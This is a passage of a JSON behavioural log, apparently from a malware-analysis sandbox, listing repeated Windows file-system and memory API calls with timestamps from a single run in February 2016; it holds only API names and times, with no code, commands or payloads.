"timestamp": "2016-02-16 17:41:53,169", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,169", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,169", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,179", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,179", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,179", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,189", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,189", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,189", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,189", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,189", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,189", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,199", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,199", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,209", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,209", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,209", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,219", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,219", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,219", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,229", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,239", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,239", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,239", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,249", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,249", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,259", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,259", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,269", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,269", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,269", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,279", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,279", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,279", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,289", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,289", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,289", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,299", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,299", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,299", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,309", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,319", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,319", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,319", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,319", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,319", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,329", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,329", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,329", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,329", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,339", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,339", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,339", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,349", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,349", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,359", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,359", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,369", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,369", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,369", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,379", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,379", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,389", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,389", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,389", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,389", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,389", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,389", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,389", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,389", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,399", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,399", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,409", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,409", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,409", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,409", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,409", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,409", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,409", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,409", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,409", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,419", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,419", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,429", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,429", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,429", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,429", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,429", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,429", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,429", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,429", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,439", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,439", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,439", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,439", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,439", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,439", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:53,439", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,439", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,449", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,449", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:53,449", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 